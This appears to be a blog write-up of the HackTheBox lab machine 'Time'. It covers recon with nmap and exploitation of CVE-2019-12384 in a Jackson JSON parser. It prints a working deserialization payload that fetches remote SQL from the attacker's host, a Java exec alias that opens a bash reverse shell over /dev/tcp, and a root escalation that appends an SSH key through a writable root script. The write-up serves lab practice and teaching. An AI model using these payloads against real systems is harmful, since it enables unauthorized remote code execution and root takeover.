dennis@home:~$

Archive

About

RSS

    Time HackTheBox

    Recon

    nmap -sC -sV 10.10.10.214

    Nmap scan report for 10.10.10.214
Host is up (0.024s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds

    Note: A open port 80 is always suspicious and should be inspect

    Playing around with the Website you can recognize an error with the validate(beta) funcionality. Googleing this error you can find that jackson/fasterxml is used. CVE-2019-12384 is the one to look for

    User

    Exploiting

    I intercepted the reqest to the website with Burp Suite and according to this github put following as request:

    look at the json in the data! Explained here

    POST / HTTP/1.1
Host: 10.10.10.214
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 184
Origin: http://10.10.10.214
DNT: 1
Connection: close
Referer: http://10.10.10.214/
Upgrade-Insecure-Requests: 1

mode=2&data=["ch.qos.logback.core.db.DriverManagerConnectionSource",%20{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT%3d3;INIT%3dRUNSCRIPT%20FROM%20'http://10.10.14.25:8000/inject.sql'"}]

    Furthermore I created a inject.sql with this content:

    CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInpu
tStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/10.10.14.25/4444 0>&1 &')

    and provided this sql with a webservice started with

    python3 -m http.server

    Simultaneously I started a listener with:

    nc -lvnp 4444

    Now I sended the request in BurpSuite and got the reverse shell where I started the listener before

    Root

    /usr/bin/timer_backup.sh is owned by root and writeable.

    Upload the pubkey.

    echo "echo SSH_PUB_KEY >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh

    SSH into the box with root

    ssh -i ~/.ssh/id_rsa root@10.10.10.214